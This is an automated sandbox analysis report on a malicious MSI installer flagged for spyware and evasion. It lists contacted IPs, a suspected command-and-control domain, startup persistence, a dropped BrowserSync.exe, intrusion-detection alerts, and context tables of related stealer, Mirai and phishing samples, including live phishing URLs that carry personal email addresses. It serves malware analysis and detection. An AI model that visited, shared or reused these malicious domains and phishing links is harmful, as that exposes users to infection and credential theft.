23.219.82.51	unknown	United States	20940	AKAMAI-ASN1EU	false
172.217.18.97	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false
20.110.205.119	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
204.79.197.219	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
184.28.190.59	unknown	United States	20940	AKAMAI-ASN1EU	false
18.173.219.84	unknown	United States	3	MIT-GATEWAYSUS	false
172.64.41.3	chrome.cloudflare-dns.com	United States	13335	CLOUDFLARENETUS	false
172.67.174.91	bamarelakij.site	United States	13335	CLOUDFLARENETUS	false
18.244.18.38	sb.scorecardresearch.com	United States	16509	AMAZON-02US	false
20.189.173.28	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false

Private

IP
192.168.2.4

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1586709
Start date and time:	2025-01-09 14:39:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 24s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	33
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	cLm7ThwEvh.msi renamed because original name is a hash value
Original Sample Name:	e04464a9c2236bdc798c112b4bfbe0d4265fe486154e3601d03e0e60cc1487ab.msi
Detection:	MAL
Classification:	mal84.spyw.evad.winMSI@71/347@23/13
EGA Information:	Successful, ratio: 60%
HCA Information:	Successful, ratio: 100% Number of executed functions: 3 Number of non-executed functions: 39
Cookbook Comments:	Found application associated with file extension: .msi

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 199.232.214.172, 192.229.221.95, 13.107.42.16, 204.79.197.203, 204.79.197.239, 13.107.21.239, 142.250.185.206, 13.107.6.158, 20.56.187.20, 2.16.168.107, 2.16.168.120, 2.23.227.208, 2.23.227.215, 2.23.227.221, 2.23.227.202, 104.124.11.163, 104.124.11.224, 2.23.227.216, 2.23.227.196, 2.23.227.197, 13.74.129.1, 13.107.21.237, 204.79.197.237, 2.16.168.115, 2.16.168.122, 20.93.72.182, 142.251.40.227, 142.251.41.3, 172.202.163.200, 184.28.90.27, 13.107.246.45, 40.126.32.74, 52.159.108.190, 13.107.246.40, 142.251.40.234, 20.75.60.91, 104.117.182.51, 23.200.0.6
Excluded domains from analysis (whitelisted): cdp-f-ssl-tlu-net.trafficmanager.net, nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, img-s-msn-com.akamaized.net, data-edge.smartscreen.microsoft.com, edgeassetservice.afd.azureedge.net, star.sf.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, clients2.google.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, login.live.com, config-edge-skype.l-0007.l-msedge.net, www.gstatic.com, l-0007.l-msedge.net, e28578.d.akamaiedge.net, star.b.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, www.bing.com, assets.msn.com.edgekey.net, fs.microsoft.com, c-bing-com.dual-a-0034.a-msedge.net, prod-atm-wds-edge.trafficmanager.net, www.googleapis.com, www-www.bing.com.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, a1834.dscg2.akamai.net, c.bing.com, edgeassetservice.azureedge.net, assets2.msn.com.edgekey.net, clients.l.google.com, config.edge.skype.com.trafficmanager.net, c-msn-com-nsatc.trafficmanager.net, arc.msn.c
Execution Graph export aborted for target BrowserSync.exe, PID 4324 because there are no executed function
Execution Graph export aborted for target BrowserSync.exe, PID 6108 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteFile calls found.
Report size getting too big, too many NtWriteVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: cLm7ThwEvh.msi

Simulations

Behavior and APIs

Time	Type	Description
08:40:43	API Interceptor	22x Sleep call for process: BrowserSync.exe modified
13:40:23	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Browseruninstall.lnk
13:41:07	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868 "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
13:41:16	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868 "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
23.219.82.51	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
104.70.121.146	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse
	file.exe	Get hash	malicious	Unknown	Browse
20.110.205.119	bc7EKCf.exe	Get hash	malicious	StormKitty	Browse
	LVkAi4PBv6.exe	Get hash	malicious	Unknown	Browse
	w3245.exe	Get hash	malicious	Unknown	Browse
	w3245.exe	Get hash	malicious	Unknown	Browse
	17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe	Get hash	malicious	Remcos	Browse
	random.exe	Get hash	malicious	Unknown	Browse
	random.exe	Get hash	malicious	Unknown	Browse
	over.ps1	Get hash	malicious	Vidar	Browse
	6684V5n83w.exe	Get hash	malicious	Vidar	Browse
	BHgwhz3lGN.exe	Get hash	malicious	Vidar	Browse
204.79.197.219	bc7EKCf.exe	Get hash	malicious	StormKitty	Browse
	LVkAi4PBv6.exe	Get hash	malicious	Unknown	Browse
	w3245.exe	Get hash	malicious	Unknown	Browse
	w3245.exe	Get hash	malicious	Unknown	Browse
	random.exe	Get hash	malicious	Unknown	Browse
	random.exe	Get hash	malicious	Unknown	Browse
	over.ps1	Get hash	malicious	Vidar	Browse
	6684V5n83w.exe	Get hash	malicious	Vidar	Browse
	BHgwhz3lGN.exe	Get hash	malicious	Vidar	Browse
	Tool_Unlock_v1.2.exe	Get hash	malicious	Vidar	Browse
18.173.219.84	dZKPE9gotO.exe	Get hash	malicious	Vidar	Browse
	nB52P46OJD.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bcu%C2%ADrio%C2%ADsi%C2%ADty%C2%ADh%C2%ADi%C2%ADve.%E2%80%8Bon%C2%ADline%2Fsys%2Fcss%2F36Cg6awhUCmCkqglue0g3yTJ/osman.turhan@hotmail.com	Get hash	malicious	Unknown	Browse
	PDFpower (1).exe	Get hash	malicious	Unknown	Browse
	https://www.canva.com/design/DAF8Uvq-1MA/-6vkRHXp8bl9cSmhMgAWZA/view?utm_content=DAF8Uvq-1MA&utm_campaign=designshare&utm_medium=link&utm_source=editor	Get hash	malicious	Unknown	Browse
	Polynomial.xlsb	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
fg.microsoft.map.fastly.net	bc7EKCf.exe	Get hash	malicious	StormKitty	Browse	199.232.214.172
	SecurityScan_Release.exe	Get hash	malicious	Unknown	Browse	199.232.210.172
	w3245.exe	Get hash	malicious	Unknown	Browse	199.232.210.172
	FLKCAS1DzH.bat	Get hash	malicious	Unknown	Browse	199.232.214.172
	nTyPEbq9wQ.lnk	Get hash	malicious	Unknown	Browse	199.232.214.172
	ktyihkdfesf.exe	Get hash	malicious	Vidar	Browse	199.232.210.172
	QhR8Zp6fZs.lnk	Get hash	malicious	RHADAMANTHYS	Browse	199.232.210.172
	CNUXJvLcgw.lnk	Get hash	malicious	RHADAMANTHYS	Browse	199.232.210.172
	xWpAZpLw47.lnk	Get hash	malicious	RHADAMANTHYS	Browse	199.232.210.172
	R4qP4YM0QX.lnk	Get hash	malicious	Unknown	Browse	199.232.210.172
s-part-0017.t-0009.t-msedge.net	EMfRi659Ir.exe	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://laserglow-technologies-industrial-48815730.hubspotpagebuilder.com/laserglow	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	colleague[1].htm	Get hash	malicious	Unknown	Browse	13.107.246.45
	bc7EKCf.exe	Get hash	malicious	StormKitty	Browse	13.107.246.45
	https://mo.iecxtug.ru/eoQpd/	Get hash	malicious	Unknown	Browse	13.107.246.45
	1In8uYbvZJ.ps1	Get hash	malicious	Unknown	Browse	13.107.246.45
	fuk7RfLrD3.exe	Get hash	malicious	LummaC	Browse	13.107.246.45
	Subscription_Renewal_Invoice_2025_FGHDCS.html	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	GT98765009064.xlsx	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://lap.gnoqwwhpwe.ru/3aeK/#Dmestevao@iif.com	Get hash	malicious	Unknown	Browse	13.107.246.45
chrome.cloudflare-dns.com	bc7EKCf.exe	Get hash	malicious	StormKitty	Browse	162.159.61.3
	Swift-TT680169 Report.svg	Get hash	malicious	Branchlock Obfuscator	Browse	162.159.61.3
	SecurityScan_Release.exe	Get hash	malicious	Unknown	Browse	162.159.61.3
	SecurityScan_Release.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	SecurityScan_Release.exe	Get hash	malicious	Unknown	Browse	162.159.61.3
	LVkAi4PBv6.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	Mansourbank Swift-TT379733 Report.svg	Get hash	malicious	Branchlock Obfuscator	Browse	172.64.41.3
	Mansourbank Swift-TT680169 Report.svg	Get hash	malicious	Branchlock Obfuscator	Browse	162.159.61.3
	w3245.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	w3245.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
sb.scorecardresearch.com	bc7EKCf.exe	Get hash	malicious	StormKitty	Browse	18.244.18.27
	https://t.co/qNQo33w8wD	Get hash	malicious	HTMLPhisher	Browse	18.244.18.32
	http://indyhumane.org	Get hash	malicious	Unknown	Browse	18.244.18.38
	LVkAi4PBv6.exe	Get hash	malicious	Unknown	Browse	18.244.18.32
	w3245.exe	Get hash	malicious	Unknown	Browse	18.244.18.27
	w3245.exe	Get hash	malicious	Unknown	Browse	18.244.18.32
	Yoranis Setup.exe	Get hash	malicious	Unknown	Browse	18.173.166.9
	random.exe	Get hash	malicious	Unknown	Browse	13.32.110.104
	random.exe	Get hash	malicious	Unknown	Browse	18.244.18.27
	nv8401986_110422.exe	Get hash	malicious	Qjwmonkey	Browse	18.244.18.122

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
MICROSOFT-CORP-MSN-AS-BLOCKUS	https://meliopayments.cloudfilesbureau.com/j319C	Get hash	malicious	HTMLPhisher	Browse	13.107.253.45
	https://laserglow-technologies-industrial-48815730.hubspotpagebuilder.com/laserglow	Get hash	malicious	HTMLPhisher	Browse	20.42.73.31
	mpsl.elf	Get hash	malicious	Mirai	Browse	22.170.57.197
	m68k.elf	Get hash	malicious	Mirai	Browse	20.74.19.248
	arm.elf	Get hash	malicious	Mirai	Browse	20.64.30.232
	arm7.elf	Get hash	malicious	Mirai	Browse	22.183.20.33
	ppc.elf	Get hash	malicious	Mirai	Browse	20.162.225.223
	spc.elf	Get hash	malicious	Mirai	Browse	22.140.64.179
	sh4.elf	Get hash	malicious	Mirai	Browse	22.238.114.39
	x86.elf	Get hash	malicious	Mirai	Browse	22.236.73.117
AKAMAI-ASN1EU	mpsl.elf	Get hash	malicious	Mirai	Browse	23.78.146.158
	m68k.elf	Get hash	malicious	Mirai	Browse	23.63.23.113
	spc.elf	Get hash	malicious	Mirai	Browse	23.194.118.65
	sh4.elf	Get hash	malicious	Mirai	Browse	23.199.18.240
	x86.elf	Get hash	malicious	Mirai	Browse	23.77.244.206
	bc7EKCf.exe	Get hash	malicious	StormKitty	Browse	104.70.121.217
	https://user-logln.net-protected.net/de/?code=9a7d7f86cffe7c7d6feaede517e284f4	Get hash	malicious	Unknown	Browse	23.2.73.221
	https://mo.iecxtug.ru/eoQpd/	Get hash	malicious	Unknown	Browse	2.16.168.11
	https://workdrive.zohopublic.com/writer/open/p369v1c9203e54b114ff78bf68159454d9c26	Get hash	malicious	Unknown	Browse	2.16.168.197
	Your Google Account has been deleted due to Terms of Service violations.eml	Get hash	malicious	Unknown	Browse	2.16.168.119
AKAMAI-ASN1EU	mpsl.elf	Get hash	malicious	Mirai	Browse	23.78.146.158
	m68k.elf	Get hash	malicious	Mirai	Browse	23.63.23.113
	spc.elf	Get hash	malicious	Mirai	Browse	23.194.118.65
	sh4.elf	Get hash	malicious	Mirai	Browse	23.199.18.240
	x86.elf	Get hash	malicious	Mirai	Browse	23.77.244.206
	bc7EKCf.exe	Get hash	malicious	StormKitty	Browse	104.70.121.217
	https://user-logln.net-protected.net/de/?code=9a7d7f86cffe7c7d6feaede517e284f4	Get hash	malicious	Unknown	Browse	23.2.73.221
	https://mo.iecxtug.ru/eoQpd/	Get hash	malicious	Unknown	Browse	2.16.168.11
	https://workdrive.zohopublic.com/writer/open/p369v1c9203e54b114ff78bf68159454d9c26	Get hash	malicious	Unknown	Browse	2.16.168.197
	Your Google Account has been deleted due to Terms of Service violations.eml	Get hash	malicious	Unknown	Browse	2.16.168.119
MICROSOFT-CORP-MSN-AS-BLOCKUS	https://meliopayments.cloudfilesbureau.com/j319C	Get hash	malicious	HTMLPhisher	Browse	13.107.253.45
	https://laserglow-technologies-industrial-48815730.hubspotpagebuilder.com/laserglow	Get hash	malicious	HTMLPhisher	Browse	20.42.73.31
	mpsl.elf	Get hash	malicious	Mirai	Browse	22.170.57.197
	m68k.elf	Get hash	malicious	Mirai	Browse	20.74.19.248
	arm.elf	Get hash	malicious	Mirai	Browse	20.64.30.232
	arm7.elf	Get hash	malicious	Mirai	Browse	22.183.20.33
	ppc.elf	Get hash	malicious	Mirai	Browse	20.162.225.223
	spc.elf	Get hash	malicious	Mirai	Browse	22.140.64.179
	sh4.elf	Get hash	malicious	Mirai	Browse	22.238.114.39
	x86.elf	Get hash	malicious	Mirai	Browse	22.236.73.117

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	digitalisierungskonzept_muster.js	Get hash	malicious	Unknown	Browse	172.67.174.91
	NvOxePa.exe	Get hash	malicious	LummaC	Browse	172.67.174.91
	digitalisierungskonzept_muster.js	Get hash	malicious	Unknown	Browse	172.67.174.91
	h3VYJaQqI9.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.174.91
	s7.mp4.hta	Get hash	malicious	LummaC	Browse	172.67.174.91
	uU6IvUPN39.exe	Get hash	malicious	LummaC	Browse	172.67.174.91
	P2V7Mr3DUF.exe	Get hash	malicious	LummaC	Browse	172.67.174.91
	v3tb7mqP48.exe	Get hash	malicious	LummaC	Browse	172.67.174.91
	xCnwCctDWC.exe	Get hash	malicious	LummaC	Browse	172.67.174.91

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\BrowserSync.exe	LVkAi4PBv6.exe	Get hash	malicious	Unknown	Browse
	w3245.exe	Get hash	malicious	Unknown	Browse
	w3245.exe	Get hash	malicious	Unknown	Browse
	9mauyKC3JW.exe	Get hash	malicious	Unknown	Browse
	ATLEQQXO.exe	Get hash	malicious	Unknown	Browse
	ATLEQQXO.exe	Get hash	malicious	Unknown	Browse
	upgrade.hta	Get hash	malicious	DarkVision Rat	Browse
	MiJZ3z4t5K.exe	Get hash	malicious	Unknown	Browse
	UolJwovI8c.exe	Get hash	malicious	Unknown	Browse
	ONHQNHFT.msi	Get hash	malicious	Unknown	Browse

Source: C:\Windows\System32\msiexec.exe	File opened: z:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: x:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: v:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: t:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: r:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: p:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: n:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: l:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: j:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: h:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: f:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: b:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: y:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: w:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: u:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: s:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: q:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: o:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: m:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: k:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: i:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: g:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: e:	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	File opened: c:
Source: C:\Windows\System32\msiexec.exe	File opened: a:	Jump to behavior

Source: Joe Sandbox View	IP Address: 20.110.205.119 20.110.205.119
Source: Joe Sandbox View	IP Address: 204.79.197.219 204.79.197.219
Source: Joe Sandbox View	IP Address: 18.173.219.84 18.173.219.84

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 172.67.174.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 172.67.174.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 172.67.174.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49887 -> 172.67.174.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49875 -> 172.67.174.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49994 -> 172.67.174.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50002 -> 172.67.174.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50012 -> 172.67.174.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50022 -> 172.67.174.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50031 -> 172.67.174.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50042 -> 172.67.174.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50078 -> 172.67.174.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50100 -> 172.67.174.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50107 -> 172.67.174.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50008 -> 172.67.174.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50118 -> 172.67.174.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50122 -> 172.67.174.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50086 -> 172.67.174.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50093 -> 172.67.174.91:443

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 2.22.50.144
Source: unknown	TCP traffic detected without corresponding DNS query: 2.22.50.144
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.190.59
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.190.59
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.190.59
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.190.59
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.190.59
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.190.59
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.190.59
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.190.59
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.190.59
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.190.59
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.190.59
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.190.59
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.190.59
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.190.59
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.190.59
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.190.59
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.190.59
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.190.59
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.190.59
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.190.59
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.190.59
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.190.59
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.190.59
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.190.59
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.190.59
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.190.59
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.190.59
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.190.59
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.190.59
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.190.59
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.190.59
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.190.59
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.190.59
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.190.59
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.190.59
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.190.59
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.190.59
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.190.59
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.190.59
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.190.59
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.190.59
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.190.59
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.190.59
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.190.59
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.190.59
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.190.59
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.190.59

Source: global traffic	HTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /resolver/api/resolve/v3/config/?expType=AppConfig&expInstance=default&apptype=edgeChromium&v=20250109.199&targetScope={%22audienceMode%22:%22adult%22,%22browser%22:{%22browserType%22:%22edgeChromium%22,%22version%22:%22117%22,%22ismobile%22:%22false%22},%22deviceFormFactor%22:%22desktop%22,%22domain%22:%22ntp.msn.com%22,%22locale%22:{%22content%22:{%22language%22:%22en%22,%22market%22:%22us%22},%22display%22:{%22language%22:%22en%22,%22market%22:%22us%22}},%22os%22:%22windows%22,%22platform%22:%22web%22,%22pageType%22:%22dhp%22,%22pageExperiments%22:[%22prg-1s-twid%22,%22prg-1s-workid%22,%22prg-1sw-agfspf1%22,%22prg-1sw-aitt-dt%22,%22prg-1sw-bg-p2%22,%22prg-1sw-cc-calfeedi%22,%22prg-1sw-cgl1qr%22,%22prg-1sw-cmevlt%22,%22prg-1sw-crypinf%22,%22prg-1sw-cryptren%22,%22prg-1sw-ldny-transit%22,%22prg-1sw-reclaim%22,%22prg-1sw-reclaim2%22,%22prg-1sw-sa-capconf2t3%22,%22prg-1sw-sa-capwp1t5%22,%22prg-1sw-sa-dnet%22,%22prg-1sw-sa-sp7-tcc%22,%22prg-1sw-saccunifyv2t1%22,%22prg-1sw-sagervunipa%22,%22prg-1sw-tbrfltr%22,%22prg-1sw-tran-trd%22,%22prg-1sw-uclam%22,%22prg-1sw-videopb%22,%22prg-1sw-videosxap%22,%22prg-1sw-wxnhcolk%22,%22prg-1sw-wxomghd%22,%22prg-1unified-u-t%22,%22prg-ad-chtag%22,%22prg-adspeek%22,%22prg-cg-ab-testing%22,%22prg-cg-game-exp-1%22,%22prg-cg-game-exp-11%22,%22prg-cg-ingames-ct%22,%22prg-cg-lstfix%22,%22prg-cg-zhcnfx%22,%22prg-cnexb%22,%22prg-fin-compof%22,%22prg-fin-hpoflio%22,%22prg-fin-poflio%22,%22prg-fin-rmar%22,%22prg-gc-pickwinner%22,%22prg-p1-txt2%22,%22prg-p1-uc3%22,%22prg-p2-tf-bdgpv-ai%22,%22prg-pr1-uc-t%22,%22prg-pr1-videos%22,%22prg-pr2-fieplc%22,%22prg-pr2-lifecycleba%22,%22prg-pr2-rail2colboard%22,%22prg-pr2-stalecontent%22,%22prg-pr2-stalecontent-dt%22,%22prg-pr2-trf-rhighimp%22,%22prg-pr2-uxmitipreimg-c%22,%22prg-pr2-widget-tab%22,%22prg-pr2-wxevolnoti%22,%22prg-pw-bhpvtip%22,%22prg-pw-t-cct-migrate%22,%22prg-pw-t-dup-content%22,%22prg-pw-t-no-ad-css%22,%22prg-sh-bd-video%22,%22prg-sh-dealsdaypdp%22,%22prg-sh-frnr%22,%22prg-sh-rmitmlnk-c%22,%22prg-shipwidoff%22,%22prg-sp-liveapi%22,%22prg-stalew